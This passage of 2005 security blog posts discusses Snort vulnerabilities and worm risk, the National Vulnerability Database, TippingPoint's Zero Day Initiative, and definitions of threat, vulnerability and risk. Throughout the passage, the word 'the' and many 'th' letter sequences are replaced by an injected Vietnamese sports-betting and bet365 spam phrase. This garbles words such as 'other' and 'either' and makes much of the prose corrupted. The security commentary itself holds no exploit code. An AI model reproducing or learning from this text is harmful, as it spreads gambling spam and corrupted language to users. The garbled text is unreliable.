  2. Sensors need not be directly targeted. All a worm has to do is send exploit UDP traffic to a segment monitored by a vulnerable Snort sensor. The attacker need not know anything about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 target's management IP address.

  3. Snort has been in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 news recently as a result of its acquisition by Checkpoint. A worm coder can kill or embarrass two birds with one UDP stone.

  4. Snort is everywhere -- .com, .net, .org, .edu, .gov, etc. 0wning a .mil or .gov Snort sensor gives intruders cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ultimate vantage point over a monitored network. I imagine sophisticated intruders have already compromised a slew of sensitive Snort sensors, but at some point a lower life form will decide to turn cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploit into a worm.

  5. Snort source code is available, so comparing 2.4.0-2.4.2 with 2.4.3 means cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability can be quickly identified.


I can imagine a few factors that will reduce cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 likelihood of a worm.

  1. The vulnerability reportedly exists in Snort versions 2.4.0 through 2.4.2. That's a narrow set of versions, given Snort 2.4.0 was released in July. I have heard of users running Snort 1.8.x and 1.9.x; cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y complain about rules that don't work with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir versions. Argh!

  2. Snort runs on a huge number of platforms. That is one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 beauties of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 program. Will a worm target Snort on Linux? If so, what distro/kernel/version/etc.? How about Snort on Windows? That would make cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most sense -- cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OS would be fairly similar, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user base would make for good targets. We'll see.

  3. Sophisticated intruders will keep any exploit to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves. They may try to keep it out of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hands of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 bottom feeders.


What do you think? Will we see a Snort worm? I'm keeping an eye on FrSIRT.

On a related note, be sure to upgrade to Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365real 0.10.13 -- 0.10.12 has bugs too.

Tuesday, September 13, 2005

Vulnerability in Snort 2.4.0 and Older

I read this news about a vulnerability in Snort 2.4.0 and older versions. You're affected if you process a malicious packet while in verbose mode. This means running Snort using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 -v switch. Typically this is only used to visually inspect traffic and not for intrusion detection purposes.

Through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 FrSIRT advisory I learned about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 discovery of this vulnerability by A. Alejandro Hernández Hernández. An exploit is available to crash Snort. Interrupting program flow to control cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 system is not indicated at this time. The researcher used Fuzzball2 to send weird packets with Selective ACKnowledgement (SACK) options through Snort and find cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploit condition.

I am impressed by Sourcefire's response to this issue, as shown by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 disclosure timeline:

  • Flaw Discovered: 20/08/2005.

  • Vendor Notification: 22/08/2005.

  • Vendor Response: 23/08/2005.

  • Date Published: 11/09/2005.


Sourcefire should have credited cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 researcher in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir vulnerability announcement, however.

You can eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r upgrade via CVS, wait for Snort 2.4.1, or not run Snort in verbose mode.

Thursday, August 25, 2005

BBC News Understands Risk

This evening I watched a story on BBC News about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem of bird flu. Here is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 story broken down in proper risk assessment language.

  • Two assets are at risk: human health and bird health. We'll concentrate on birds in this analysis. Healthy birds are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 asset we wish to protect.

  • The threat is wild migratory birds infected by bird flu.

  • The threat uses an exploit, namely bird flu itself.

  • The vulnerability possessed by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 asset and exploited by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 threat is lack of immunity to bird flu.

  • A countermeasure to reduce cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 asset's exposure to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 threat is keeping protected birds indoors, away from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir wild counterparts.

  • The risk is infection of domesticated birds by wild birds. All infected birds must be killed.


The TV story I watched contained this quote by reported Tom Heap:

"The lesson learned from foot-and-mouth [disease, which ravaged Europe several years ago] is to do your best to keep cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 disease out, but assume that will fail. Be ready to tackle any outbreak to prevent an epidemic."

Let's replace certain terms with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security counterparts:

"The lesson learned from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last time we were compromised is to do your best to keep intruders out, but assume that will fail. Be ready to respond to any intrusion to prevent complete compromise of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 organization."

This is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 power of using proper terminology. Lessons from ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r scientific fields can be applied to our own problems, and we avoid re-inventing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 wheel.

Tuesday, August 16, 2005

National Vulnerability Database

I learned today cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 National Vulnerability Database (NVD) has replaced cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 old NIST ICAT system. The NVD describes itself this way:

"NVD is a comprehensive cyber security vulnerability database that integrates all publicly available U.S. Government vulnerability resources and provides references to industry resources. It is based on and synchronized with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CVE vulnerability naming standard."

There's a link to a workload index, whose URL includes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 term "threatindex" (groan). On that page we read:

"Workload Index Information

This index calculates cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 number of important vulnerabilities that information technology security operations staff are required to address each day. The higher cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 number, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 greater cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 workload and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 greater cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 general threat represented by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerabilities."

I think cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last sentence should instead read:

"The higher cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 number, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 greater cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 workload and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 greater cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 general risk represented by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerabilities."


I am not sure what cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Open Source Vulnerability Database (OSVDB) thinks of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 NVD. There is a blog posting about NVD, but no commentary by OSVDB members. I think cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OSVDB needs to remain as a place that is independent of US government control. If a truly severe vulnerability is found, who is more likely to publish it first -- nvd.nist.gov or www.osvdb.org?

On a note related to vulnerabilities, here is a list of vulnerability or attack description projects.

These are papers on related subjects:

Wednesday, July 27, 2005

Snort "Not Eliligible" for Zero Day Initiative

I recently wrote about TippingPoint's Zero Day Initiative (ZDI), a pay-for-vulnerabilities program. Thank you to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 poster (whom I will keep anonymous) for notifying me of this article Vendors Compete for Hacker Zero Days by Kevin Murphy. It features this quote:

"[C]ompetitors will have to sign agreements to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 effect that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y will not irresponsibly disclose cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 information, and that any data cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y provide to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir own customers cannot be easily reverse engineered into an attack, he [3Com’s David Endler] said.

"'Some technology based on Snort would not be eligible because Snort by its nature is open,' Endler said, referring to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 open-source IDS software. 'But cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are products based on Snort that are closed. We’ll have to take it on a case-by-case basis.'"

This means Sourcefire will never be able to learn of ZDI vulnerabilities. Any registered Snort user can download Sourcefire VRT rules and see everything except rules younger than five days old. VRT subscribers have access to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latest rules immediately.

It sounds to me like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 only "technology based on Snort" that would be "eligible" would be sensors provided by a managed security services provider, or sensors sold without access to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 console and rule sets. Such vendors could add ZDI-inspired rules but never let users see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m.

I never thought for a minute TippingPoint would do anything to help Sourcefire, as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are two major competitors in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 (misnamed) IPS market.

Monday, July 25, 2005

Thoughts on TippingPoint Zero Day Initiative Program

Through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 accursed Slashdot I learned of Tipping Point's Zero Day Initiative program. (Incidentally, I just figured out that Slashdot is like Saturday Night Live: we all remember it being a lot better years ago, it stinks now, yet we still watch.) According to this CNet story by Joris Evers, which cites TippingPoint's rationale for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 program:

"'We want to reward and encourage independent security research, promote and ensure responsible disclosure of vulnerabilities and provide 3Com customers with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world's best security protection,' David Endler, director of security research at TippingPoint, said in an interview."

This program is similar to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 iDEFENSE Vulnerability Contributor Program launched in 2002 amidst much fanfare. This April 2003 interview with iDEFENSE VPC Manager Sunil James is also enlightening. Part of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 VCP is a retention reward program that paid a $3,000 bonus to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Danish CIRT and $1,000 to l0rd_yup for vulnerabilities reported to iDEFENSE in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first quarter of 2005. Some iDEFENSE advisories give anonymous credit to vulnerability discovers, like Sophos Anti-Virus Zip File Handling DoS Vulnerability, while ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs name cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir sources, like Lord Yup in Microsoft Word 2000 and Word 2002 Font Parsing Buffer Overflow Vulnerability. In some cases iDEFENSE Labs finds cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hole, as in Adobe Acrobat Reader UnixAppOpenFilePerform() Buffer Overflow Vulnerability.

Thus far I have not heard much discussion about iDEFENSE's program, although it seems like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 payout to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability researchers is dwarfed by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 value earned by iDEFENSE. Ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rwise I have not heard too many condemnations of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pay-for-bugs program and I have not heard of anyone suing iDEFENSE over a vulnerability produced through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir VCP.

Looking at some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 details of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 TippingPoint Zero Day Initiative, I found this item in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir FAQ amusing:

"Since 3Com and TippingPoint customers are protected prior to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 disclosure, are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y aware of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability?

In order to maintain cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 secrecy of a researcher's vulnerability discovery until a product vendor can develop a patch, 3Com and TippingPoint customers are only provided a generic description of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 filter provided but are not informed of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability. Once details are made public in coordination with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 product vendor, TippingPoint's Digital Vaccine® service for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Intrusion Prevention System provides an updated description so that customers can identify cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 appropriate filters that were protecting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. In ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r words, 3Com and TippingPoint will be protected from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability in advance, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y will not be able to tell from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 description what cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability is."

Anyone who reads this blog knows I think this sort of "protection through secrecy" is ridiculous. If I can't figure out how a product is making its decision to "protect" me, I will try to avoid it. I certainly wouldn't want it blocking traffic on my behalf. What about anti-virus software, you ask? I don't run it on my servers!

This is also funny:

"Why are you giving advance notice of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability information you've bought to ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r security vendors, including competitors?

We are sharing with ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r security vendors in an effort to do cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most good with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 information we have acquired. We feel we can still maintain a competitive advantage with respect to our customers while facilitating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 protection of a customer base larger than our own.

What types of security vendors are eligible for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 advanced notice?

In order to qualify for advanced notice, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security vendors must be in a position to remediate or provide protection of vulnerabilities with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir solution, while not revealing details of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability itself to customers. The security vendor's product must also be resistant to discovery of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability through trivial reverse engineering. An example of such a vendor would be an Intrusion Prevention System, Intrusion Detection System, Vulnerability Scanner or Vulnerability Management System vendor."

I am eager to see what vendors can live up to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se requirements. Snort rules won't, and neicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r will Nessus NASL scripts.

I am uneasy about programs like this. Consider modifying Mr. Endler's statement in this manner:

"We want to reward and encourage independent security research, promote and ensure responsible creation of viruses and provide our customers with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world's best security protection."

A virus is malware launched by a threat; it's not a vulnerability. Publication of a vulnerability does not explicitly mean publication of new code to be used by threats. Still, it's not that difficult to move from vulnerability disclosure to exploit creation.

TippingPoint is basically paying researchers to justify cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vendor's existence. No vulnerabilities = no need to buy a TippingPoint IPS. More vulnerabilities means more opportunities for threats to craft exploit code, and that justifies buying more IPSs.

How is this different from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Mozilla Bug Bounty program, you might ask? When Mozilla pays researchers to report vulnerabilities in Mozilla code, Mozilla is effectively outsourcing its security quality assurance program. This is done to improve cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 quality of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 software released by Mozilla. When TippingPoint pays researchers to report vulnerabilities in anyone's software, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n keeps those vulnerabilities to itself (followed by limited disclosure), TippingPoint is justifying its product's existence.

You might also wonder what I think of Microsoft's $250,000 bonus to those who expose virus writers. I have no problems with such a program, and I see it as anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r way to remove threats from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 streets.

Friday, July 08, 2005

Cool Site Unfortunately Miscategorizes Threats

While chatting with Aaron Higbee of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SecureMe Blog yesterday, he mentioned a cool new site: Threats and Countermeasures. A majority of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 contributors are Foundstone consultants and parent company McAfee is paying cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 bills.

Anyone who's been reading my blog for a while knows of my linguistic crusade involving words in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 standard risk equation, with risk being a product of threat, vulnerability, and asset value. (See Risk, Threat, and Vulnerability 101, OCTAVE Properly Distinguishes Between Threats and Vulnerabilities, SANS Confuses Threats with Vulnerabilities, and The Dynamic Duo Discuss Digital Risk.)

How does cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Threats and Countermeasures site match proper definitions? At left is a screen shot of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 site's main knowledge base menu. I don't see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 word threat being used correctly here. "Default network appliance passwords" aren't threats; those are vulnerabilities. "Running unnecessary services" is a vulnerability, as is "weak security around scripting extensions."

Perusing T&C, I don't see threat used properly. Most of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 content described as "threats" are really attacks. The Cross Site Scripting page is a good example. All of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 content listed under "Threats" are attacks or exploits. The content under "Attacks" appear to be specific examples of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 material listed under "Threats".

So what is going on here? Obviously cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 guys who put togecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r Threats and Countermeasures are security experts. Besides cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir knowledge base, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 site offers and impressive collection of blogs that I recommend reading.

I think part of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 warped view of threats promulgated by T&C owner Foundstone. It all began with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 announcement of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir so-called Threat Correlation Module for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Foundstone "Enterprise Risk Solution" suite. Back in late 2003 when this announcement was made (and I was working for Foundstone), marketing folks realized cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 terms "vulnerability" and "vulnerability management" were no longer a way to differentiate a company in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 market. Vulnerability management was becoming commoditized, so companies began pushing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 terms "risk" (e.g., "Enterprise Risk Solution") and "threat."

I was initially interested in being part of Foundstone's new Threat Intelligence team, supporting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Threat Correlation Module. I thought this would be a cool opportunity to deploy honeynets, interact with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "underground," and collect intelligence on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 parties that conduct attacks. Instead I was told I would monitor disclosure sites -- BugTraq and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 like -- and populate Foundstone's database with that information. At one point I was told that a "hole in OpenSSH" is a "threat," when clearly that is a vulnerability. Shortly after I realized Foundstone's view of "threat" was a new way to market vulnerability data, I left cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 company.

This is not to say that Foundstone's product is bad. On cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 contrary, I think it is very powerful. The idea of correlating new vulnerability information against a database of enterprise assets, and measuring cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 risk to an organization, is excellent. It's just too bad cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 product and concept are misnamed.

While it is difficult to misuse cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 term risk (risk being defined as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 probability of suffering harm or loss), it is too easy to misuse "threat." As a reminder, a vulnerability is a weakness in an asset which could lead to exploitation. A threat is a party with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 capabilities and intentions to exploit a vulnerability in an asset.

With few exceptions, no security vendors deal with threats. There are only two ways to gacá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r information on threats: passive interaction or active interaction. Passive interaction means watching threats as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y conduct reconnaissance, exploit targets, and pillage assets. Active interaction means communicating with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 threats cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves, through email, voice, and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r means.

Two organizations I know that deal with threats in an unclassified environment include The Honeynet Project and iDEFENSE. The former mainly learns about threats by watching cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m compromise honeynets, while cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latter pursues and communicates with threats. Managed security monitoring providers who look for more than worms can also be considered threat-aware; examples include NetSec and LURHQ.

I guess cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "threat" concept is just too sexy for most security vendors to avoid. Even people who should know better, like Bruce Schneier, misuse cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 terms threat and vulnerability. (See my review of Beyond Fear; it's cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 second on that page.) Although I will probably be seen as stepping on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 toes of smart security people, I will not stop pointing out when those important terms are misused.

Thursday, June 16, 2005

Gartner Survey Ranks Threats

I found cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 article Corporates focus on basics for IT security defences by John Leyden to be interesting. He reports on a survey presented by Gartner at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir recent IT Security Summit. Gartner's survey found that IT staff ranked threats as follows:

1. Viruses and Worms
2. Outside Hacking or Cracking
3. Identity Theft and Phishing
4. Spyware
5. Denial of Service
6. Spam
7. Wireless and Mobile Device Viruses
8. Insider Threats
9. Zero Day Threats
10. Social Engineering
11. Cyber-Terrorism

I am disappointed to see social engineering ranked so low. I am glad cyber-terrorism is dead last. I am surprised to see outside hacking ranked so high, even though I agree it should be a top three priority.

Here is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 list I would create (if I had to call cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se "threats;" many of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se are not "threats." I rank cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se "problems" or issues using a mixture of likelihood and damage inflicted. I do not agree with all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 categories presented, but here is my best assessment.

1. Viruses and Worms
2. Outside Hacking or Cracking
3. Spyware
4. Denial of Service
5. Insider Threats
6. Identity Theft and Phishing
7. Social Engineering
8. Zero Day Threats
9. Spam
10. Wireless and Mobile Device Viruses
11. Cyber-Terrorism

Also according to John, "More than half cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 respondents said cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y preferred buying 'best-of-breed' products from multiple technology providers while a third of those quizzed preferred integrated security suites, a preference catered for by a growing list of firms selling integrated security appliances."

By cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 way, I contacted Gartner about covering cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 summit for this blog and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y completely ignored me. Thanks guys! So much for "new media" and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "blogosphere."

Thursday, May 05, 2005

Risk, Threat, and Vulnerability 101

In my last entry I took some heat from an anonymous poster who seems to think I invent definitions of security terms. I thought it might be helpful to reference discussions of terms like risk, threat, and vulnerability in various documents readers would recognize.

Let's start with NIST publication SP 800-30: Risk Management Guide for Information Technology Systems. In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 text we read:

"Risk is a function of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 likelihood of a given threat-source's exercising a particular potential vulnerability, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 resulting impact of that adverse event on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 organization. To determine cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 likelihood of a future adverse event, threats to an IT system must be analyzed in conjunction with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 potential vulnerabilities and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 controls in place for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IT system."

The document outlines common threats:

  • Natural Threats: Floods, earthquakes, tornadoes, landslides, avalanches, electrical storms, and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r such events.

  • Human Threats Events that are eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r enabled by or caused by human beings, such as unintentional acts (inadvertent data entry) or deliberate actions (network based attacks, malicious software upload, unauthorized access to confidential information).

  • Environmental Threats: Long-term power failure, pollution, chemicals, liquid leakage.


I see no mention of software weaknesses or coding problems cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re. So how does NIST define a vulnerability?

"Vulnerability: A flaw or weakness in system security procedures, design, implementation, or internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 system's security policy."

The NIST pub's threat-vulnerability pairings table makes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 difference between cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 two terms very clear:



SP 800-30 talks about how to perform a risk assessment. Part of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 process is threat identification and vulnerability identification. Sources of threat data include "history of system attack, data from intelligence agencies, NIPC, OIG, FedCIRC, and mass media," while sources of vulnerability data are "reports from prior risk assessments, any audit comments, security requirements, and security test results."

The end of SP 800-30 provides a glossary:


  • Threat: The potential for a threat-source to exercise (accidentally trigger or intentionally exploit) a specific vulnerability.

  • Threat-source: Eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r (1) intent and method targeted at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 intentional exploitation of a vulnerability or (2) a situation and method that may accidentally trigger a vulnerability.

  • Threat Analysis: The examination of threat-sources against system vulnerabilities to determine cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 threats for a particular system in a particular operational environment.

  • Vulnerability: A flaw or weakness in system security procedures, design, implementation, or internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 system's security policy.


